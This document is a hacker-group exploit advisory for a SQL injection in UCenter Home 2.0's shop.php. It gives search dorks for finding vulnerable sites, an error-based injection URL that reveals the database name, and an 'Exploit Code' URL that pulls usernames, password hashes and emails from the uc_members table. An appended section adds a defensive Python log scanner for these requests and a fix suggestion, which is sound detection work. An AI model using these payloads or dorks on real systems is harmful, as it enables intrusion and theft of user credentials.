__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php
value's : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Need Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.

for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okey.

You edit the DB name: `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'

Edit : Okey.

Use hex conversion and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
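
A defender-side check for the request pattern above, as an added example that is not part of the original advisory: it scans web access log lines for shop.php requests whose shopid is not a plain integer and flags the error-based markers visible in the advisory's payload. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line of a combined-log-format entry (the log format is an assumption).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Substrings characteristic of the error-based payload shape in the advisory.
MARKERS = ("information_schema", "floor(rand(", "group by", "concat(")

def inspect_line(line):
    """Return a finding dict for a suspicious shop.php request, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if url.path.lower().rsplit("/", 1)[-1] != "shop.php":
        return None
    for value in parse_qs(url.query, keep_blank_values=True).get("shopid", []):
        if re.fullmatch(r"[0-9]+", value):
            continue  # a legitimate shopid is a plain integer
        # Normalise: lower-case, drop /**/ comments, collapse whitespace.
        norm = re.sub(r"/\*.*?\*/", " ", value.lower())
        norm = re.sub(r"\s+", " ", norm)
        hits = [k for k in MARKERS if k in norm]
        verdict = "error-based-sqli" if len(hits) >= 2 else "non-integer-shopid"
        return {"shopid": value, "markers": hits, "verdict": verdict}
    return None

def scan(lines):
    """Inspect every log line and keep only the findings."""
    return [f for f in map(inspect_line, lines) if f]

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2011:10:00:00 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2011:10:00:05 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from'
    '(select%20count(*),concat(0x7e,floor(rand(0)*2))x%20from%20information_schema.tables'
    '%20group%20%20by%20x)a) HTTP/1.1" 200 312',
    '198.51.100.7 - - [01/Jan/2011:10:00:09 +0000] "GET /shop.php?ac=view&shopid=253%27 HTTP/1.1" 200 298',
    '203.0.113.9 - - [01/Jan/2011:10:00:12 +0000] "GET /index.php?shopid=abc HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["verdict"], finding["markers"])
```

Log matching only surfaces attempts; the durable fix is on the application side, where shopid should be cast to an integer or bound as a query parameter before it reaches the SQL statement.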